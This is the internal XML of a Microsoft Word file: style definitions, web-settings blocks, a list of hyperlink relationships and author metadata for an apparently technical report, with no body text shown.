        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="40"/>
      <w:ind w:left="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40A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40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40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23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4D40A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D40AC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4472C4" w:themeColor="accent1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:rsid w:val="004D40AC"/>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rsid w:val="004D40AC"/>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rsid w:val="004D40AC"/>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4D40AC"/>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4D4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40A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D40AC"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="004D40AC"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004D40AC"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="004D40AC"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="004D40AC"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004D40AC"/>
    <w:pPr>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004D40AC"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:qFormat/>
    <w:rsid w:val="004D40A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D40AC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="323E4F" w:themeColor="text2" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
      <w:kern w:val="28"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004D40AC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="004D40AC"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="004D40AC"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NoSpacingChar">
    <w:name w:val="No Spacing Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="NoSpacing"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="004D40AC"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention1">
    <w:name w:val="Unresolved Mention1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CE2C66"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Code">
    <w:name w:val="Code"/>
    <w:basedOn w:val="NoSpacing"/>
    <w:link w:val="CodeChar"/>
    <w:qFormat/>
    <w:rsid w:val="00A351B2"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Times New Roman"/>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CodeChar">
    <w:name w:val="Code Char"/>
    <w:link w:val="Code"/>
    <w:rsid w:val="00A351B2"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Times New Roman"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FC027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C027E"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FC027E"/>
    <w:pPr>
      <w:spacing w:before="120"/>
      <w:ind w:left="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FC027E"/>
    <w:pPr>
      <w:ind w:left="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="00FC027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C027E"/>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C027E"/>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FC027E"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="GridTable6Colorful1">
    <w:name w:val="Grid Table 6 Colorful1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:next w:val="GridTable6Colorful"/>
    <w:uiPriority w:val="51"/>
    <w:rsid w:val="00FC027E"/>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FC027E"/>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FC027E"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00FC027E"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="4472C4" w:themeColor="accent1"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="BookTitle">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat/>
    <w:rsid w:val="00FC027E"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:qFormat/>
    <w:rsid w:val="00FC027E"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>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C027E"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00FC027E"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4472C4" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="LightList-Accent1">
    <w:name w:val="Light List Accent 1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="61"/>
    <w:rsid w:val="00FC027E"/>
    <w:rPr>
      <w:rFonts w:ascii="New York" w:eastAsia="Times New Roman" w:hAnsi="New York"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apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00FC027E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FC027E"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FC027E"/>
    <w:pPr>
      <w:ind w:left="960"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FC027E"/>
    <w:pPr>
      <w:ind w:left="1200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FC027E"/>
    <w:pPr>
      <w:ind w:left="1440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FC027E"/>
    <w:pPr>
      <w:ind w:left="1680"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FC027E"/>
    <w:pPr>
      <w:ind w:left="1920"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="NoSpacing"/>
    <w:next w:val="NoSpacing"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00FC027E"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="44546A" w:themeColor="text2"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="FootnoteText">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FootnoteTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FC027E"/>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FC027E"/>
  </w:style>
  <w:style w:type="character" w:styleId="FootnoteReference">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FC027E"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Revision">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00FC027E"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FC0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C027E"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FC027E"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableofFigures">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FC027E"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="440" w:hanging="440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Appendix">
    <w:name w:val="Appendix"/>
    <w:basedOn w:val="Heading2"/>
    <w:link w:val="AppendixChar"/>
    <w:qFormat/>
    <w:rsid w:val="00FC027E"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="27"/>
      </w:numPr>
      <w:spacing w:line="276" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FC027E"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00FC027E"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="AppendixChar">
    <w:name w:val="Appendix Char"/>
    <w:basedOn w:val="Heading1Char"/>
    <w:link w:val="Appendix"/>
    <w:rsid w:val="00FC027E"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4472C4" w:themeColor="accent1"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention2">
    <w:name w:val="Unresolved Mention2"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006C1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58649">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="241917597">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="20861144">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="7754104">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="11856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13704">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1093355690">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1093630648">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1348871887">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="197163832">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1340308973">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="2770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1518">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="603267851">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="426854886">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="2592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3815">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="20690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hyperlink" Target="http://libselinux.so/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.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215.237.119.171/config.html"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2.xml"/><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sdoj.gov"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2274-9503-492D-82DE-92D7BEC6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9186</Words>
  <Characters>337363</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>2811</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Hankins</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>William Arbaugh</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-09-12T18:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-29T19:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>